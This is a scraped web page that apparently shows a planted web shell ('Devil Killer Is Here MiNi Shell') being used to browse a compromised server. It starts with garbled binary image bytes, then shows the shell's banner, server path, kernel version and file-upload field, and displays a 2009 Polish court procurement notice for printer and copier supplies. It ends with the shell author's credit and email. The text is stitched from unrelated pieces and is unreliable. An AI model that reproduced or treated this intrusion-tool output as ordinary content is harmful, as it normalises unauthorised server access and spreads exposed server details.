JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090324/75544-N-2009.html

<p class="kh_header"><b>Lublin: Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych  do drukarek,  kserokopiarek i faksów</b><br>
<b>Numer ogłoszenia: 75544 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Lublinie , ul. Krakowskie Przedmieście 76, 20-950 Lublin, woj. lubelskie, tel. 081 5359261, faks 081 53 59 261.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lublin.sr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dostawa materiałów eksploatacyjnych  do drukarek,  kserokopiarek i faksów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest dostawa materiałów eksploatacyjnych:
a) do drukarek typu: BROTHER HL 2030; HP 1010;HP 1150;HP 1300; HP 2015; HP 2430TN; 
HP 2600; HP4015; LEXMARK  T 642; OKI B6300DN; OKI  B6500; SAMSUNG ML 2250; SAMSUNG ML 3561ND; SAMSUNG SCX 5530FN;  HP Deskjet 3920; HP Deskjet 930C ;LEXMARK P706; LEXMARK X7350;
b) do kserokopiarek typu: CANON IR 2016/2016J/2018; RICOH AF220;
c) do faksów typu: PANASONIC KX-FLM653; PANASONIC KX MB773; 
2. Szczegółowy opis przedmiotu zamówienia zawiera dodatek  nr 1 do s.i.w.z.  
3. Materiały eksploatacyjne muszą być fabrycznie nowe, nie noszące śladów uszkodzeń zewnętrznych oraz uprzedniego używania. Za fabrycznie nowy nie uznaje się wyrobu, gdzie pojemnik został jedynie wyczyszczony i ponownie napełniony, tzw. regenerowany.
4. Materiały eksploatacyjne nie mogą ograniczać pełnej współpracy z programem urządzenia monitorującym stan zasobników z tuszem lub tonerem.
5. Ilekroć w opisie przedmiotu zamówienia zawartym w niniejszej s.i.w.z. wskazane zostały normy, znaki towarowe lub pochodzenie Zamawiający dopuszcza rozwiązania równoważne.
6. Dostarczone materiały eksploatacyjne mają być oryginalne tj. wyprodukowane przez producenta urządzenia lub równoważne oryginalnym. Przez równoważne należy rozumieć: funkcjonalność, jakość wydruku (kopii), wydajność, szybkość schnięcia (utrwalenia), nie zamazywanie się druku (kopii) - odpowiadające wyrobom producenta urządzenia.
7. Oferowane równoważne tonery muszą spełniać warunek bezkonfliktowej pracy z danym urządzeniem, w stopniu nie mniejszym niż wskazany z symbolu oryginał, a w szczególności dotyczy to wydajności danego tonera, która nie może być mniejsza niż w materiałach oryginalnych.
8. Wykonawca zobowiązany będzie dostarczyć materiały eksploatacyjne spełniające wymagania Zamawiającego. Ponadto powinny one być zgodne co do producenta, typu, modelu i nazwy z tymi, które Wykonawca zaoferował. Zamawiający wymaga aby Wykonawca wypełnił kolumnę oznaczoną cyfrą  3 tabeli zamieszczonej w formularzu cenowym (dodatek nr 3 do s.i.w.z.). Opisy zamieszczone przez Wykonawców w ww. kolumnie traktowane będą jako deklaracja Wykonawcy dotycząca dostarczanych przez niego materiałów eksploatacyjnych, a także będą służyły Zamawiającemu do sprawdzenia, czy dostarczane przez wybranego Wykonawcę materiały eksploatacyjne są zgodne z zaoferowanymi. 
9. Zamawiający informuje, że w trakcie realizacji Umowy, Wykonawca zobowiązany będzie do dostarczania materiałów eksploatacyjnych partiami - w formie zamówień cząstkowych (świadczeń częściowych) stosownie do potrzeb Zamawiającego. Zamawiający przewiduje, że zazwyczaj będzie to jedna dostawa częściowa w ciągu miesiąca. Wielkość i termin dostarczenia każdej partii materiałów eksploatacyjnych będzie wynikać z jednostronnej dyspozycji Zamawiającego, która przesłana będzie Wykonawcy pisemnie, faksem lub drogą elektroniczną.
10.  W dniu dostawy materiałów eksploatacyjnych Wykonawca zobowiązany będzie także do odbioru zużytych tonerów. Wykonawca zobowiązany będzie do dostarczania materiałów eksploatacyjnych do pomieszczeń wyznaczonych przez Zamawiającego, znajdujących się w Lublinie przy ul. Krakowskie Przedmieście 76 oraz K. Wallenroda 4d. W tych też pomieszczeniach przekazywane będą Wykonawcy zużyte tonery.
11. Zamawiający nie dokonał podziału zamówienia i w związku z tym nie dopuszcza możliwości składania ofert częściowych.
12. Zamawiający nie przewiduje dokonania wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
13. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.00-2, 30.12.51.10-5, 30.19.21.13-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 2 000,00zł (słownie: dwa tysiące zł)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, czyli:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
    nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
       i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. W przypadku przedmiotowego postępowania wykażą się należytym wykonaniem w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, co najmniej dwóch dostaw materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów, o wartości brutto co najmniej 150 000 zł każda. Przez wartość dostawy Zamawiający rozumie łączną wartość dostarczonych materiałów eksploatacyjnych do drukarek, kserokopiarek i faksów, w ramach jednej umowy. Przez jedną dostawę Zamawiający rozumie sumę dostaw w ramach jednej umowy.
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust. 1 i 2 ustawy).
2.	Oceny spełniania warunków udziału w postępowaniu Zamawiający dokona na podstawie przedłożonych przez Wykonawców dokumentów określonych w  §  6 s.i.w.z.
3.	Ocena spełniania warunków udziału w postępowaniu o udzielenie zamówienia dokonana zostanie zgodnie z formułą  /spełnia - nie spełnia/, w oparciu o informacje zawarte w dokumentach  i oświadczeniach wyszczególnionych w § 6 niniejszej s.i.w.z. Z treści załączonych dokumentów musi  wynikać jednoznacznie, iż warunki udziału w postępowaniu Wykonawca spełnił. 
4.	Niespełnienie przez Wykonawcę warunków udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.
5.	W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia, okoliczności uzasadniające wykluczenie Wykonawcy z mocy art. 24 ustawy zachodzące choćby względem pojedynczego współubiegającego się, dyskwalifikują całą grupę.
6. Wymagania Zamawiającego odnośnie oferowanych materiałów eksploatacyjnych Zamawiający wymaga, aby Wykonawca zaoferował materiały eksploatacyjne spełniające wymagania określone przez Zamawiającego w szczegółowym opisie przedmiotu zamówienia (dodatek nr 1 do s.i.w.z.).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Każdy z Wykonawców powinien złożyć oryginał oświadczenia, że nie podlega wykluczeniu na podstawie art. 24 ustawy oraz spełnia warunki udziału w postępowaniu określone w art. 22 ust. 1 pkt  1-3 ustawy [zgodnie z formularzem stanowiącym dodatek nr 5 do s.i.w.z.]. W przypadku składania oferty wspólnej, oświadczenie powinien złożyć każdy z Wykonawców składających ofertę wspólną. 
 W przypadku, gdy Wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia do oferty powinien dołączyć zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
2.W celu potwierdzenia, że Wykonawca spełnia wymagany warunek określony w § 5 ust. 1 lit. b  s.i.w.z., Wykonawca powinien złożyć wykaz wykonanych dostaw w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że dostawy  te zostały wykonane należycie. Wykaz winien zawierać co najmniej dwie pozycje [wg dodatku nr 6 do s.i.w.z.]. 
3. Na potwierdzenie warunku określonego w § 5 ust. 1 lit. d s.i.w.z. każdy z Wykonawców powinien złożyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej [wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert].
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentu, o którym mowa w ust. 3,  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub  miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.
5. Dokumenty, o których mowa w  ust. 4  powinny  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składnia ofert. 
6. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w ust. 4, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepisy ust. 5 stosuje się odpowiednio.
7. W celu potwierdzenia, że oferowane materiały eksploatacyjne odpowiadają wymaganiom Zamawiającego, w przypadku oferowania tonerów równoważnych (innych niż wyprodukowanych przez producenta urządzenia), Wykonawca powinien do oferty dołączyć:
1) ważny na dzień wyznaczony jako termin składania ofert certyfikat potwierdzający, że proces produkcji oferowanych materiałów eksploatacyjnych przebiega zgodnie z normą ISO 9001 lub równoważny (dla każdego producenta oferowanego produktu z osobna),
2)  ważny na dzień wyznaczony jako termin składania ofert certyfikat potwierdzający, że producent oferowanych materiałów eksploatacyjnych działa w oparciu o System Zarządzania Środowiskiem zgodny z wymaganiami normy  ISO 14001 lub równoważny (dla każdego producenta oferowanego produktu z osobna),
3) zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczone produkty odpowiadają określonym normom lub specyfikacjom technicznym. tzn. z zaświadczenia powinno wynikać, jaką wydajność zgodnie z normą ISO/IEC 19752 i ISO/IEC 19798 mają poszczególne oferowane tonery. Zaświadczenie podmiotu uprawnionego do kontroli jakości, o którym mowa powyżej, to zaświadczenie wydane przez podmiot trzeci, uprawniony do kontroli jakości oferowanego wyrobu będącego przedmiotem dostawy. Podmiot ten powinien posiadać stosowną akredytację pod katem wymogów normy ISO/IEC 19752 i ISO/IEC 19798.
8. Dokumenty, o których mowa w ust. 2, 3, 4, 6 i 7 powinny być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem  przez Wykonawcę. W przypadku składania elektronicznych kopii dokumentów powinny być one opatrzone przez Wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lublin.sr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Lublinie, ul. Krakowskie Przedmieście 76, 20-950 Lublin,  pok. 27.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2009 godzina 13:00, miejsce: Sąd Rejonowy w Lublinie, na  Biurze Podawczym Sądu, (Lublin, przy ul. Krakowskie Przedmieście 78, pokój 1) lub w pokoju 14, (Lublin, ul. Krakowskie Przedmieście 76), albo przesłać pocztą.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com